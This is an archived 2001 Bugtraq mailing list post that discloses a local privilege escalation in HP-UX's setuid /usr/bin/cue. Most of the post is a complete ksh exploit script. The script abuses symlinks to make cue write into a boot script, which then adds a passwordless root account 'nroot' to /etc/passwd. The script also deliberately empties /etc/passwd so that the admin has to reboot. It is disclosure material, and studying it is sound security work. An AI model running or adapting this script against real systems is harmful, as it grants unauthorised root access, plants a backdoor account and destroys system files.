Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

HPUX / 800 models / Old-styled exploit for cue

From: e-chang () spacemail com
Date: Fri, 8 Jun 2001 09:49:52 -0600 (MDT)
Hi there,


One of the major problems I see with admins/security nowadays
is  that admin don't secure their host : they install patches

...which is slightly different.

It reminds me of this (very) old advisory which was issued by
HP in 1997 (!!!) about /usr/bin/cue :

In the "Workarounds/Solution" section, the advice was to :

# chmod 400 /usr/bin/cue
or
# chgrp trusted /usr/bin/cue
# chmod 4750 /usr/bin/cue

...but  admins just  don't  read  advisories. They patch...
...and  there  was no patch for cue. This explains why most
of big HPUX servers are still vulnerable.

I  don't  know  the reason why, but I think I've never seen
any exploit for this one.

Let's remember the "Scriptors of Doom" days !
Local root exploit below.


Emilie Chang.
----------

#!/usr/bin/ksh

##
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
##
## This is just a proof of concept. Don't use for malicious
## purpose. If ever you decide to run that script, please
## read the code carefully before!
##
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
## people. Good job sweethearts.
##
## Old-styled exploit, tested on HPUX 10.20, model 899
## Warning : /usr/bin/cue exists on HPUX 800 models only
##
## Let's test the model by the way...
##

MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
export MODEL

if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
then
     echo "Your host doesn't look like a HPuX 8** model, stopping now."
     exit
fi

##
## Test whether /usr/bin/cue exists or not...
##

if [ ! -u /usr/bin/cue ]
then
     echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
     exit
fi

##
## Well you passed the above tests. Going on playing.
## Creating a file within /etc/rc.config.d : It will
## be executed at next reboot (which might happen
## soon)
##

TTY=`tty | awk -F '/' '{print $3}'`
export TTY

TERM=whatevah
export TERM

umask 000
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null

##
## Inserting evil root account within /etc/passwd
##

echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit

##
## Now saving the passwd file, which we are about to empty
## 

cp /etc/passwd /tmp/passwd

##
## passwd file destruction
## (SOMEONE SET US UP THE BOMB !!)
##

rm IDMERROR.$TTY
ln -s /etc/passwd IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null

##
## *POOF*, now that the /etc/passwd file is emptied, admin
## MUST reboot to get things done.
##

echo "Your nroot account will be created within /etc/passwd"
echo "with no password. Remove it asap, it's just a proof"
echo "of concept!"

# The end.
Previous By Date Next
Previous By Thread Next

Current thread: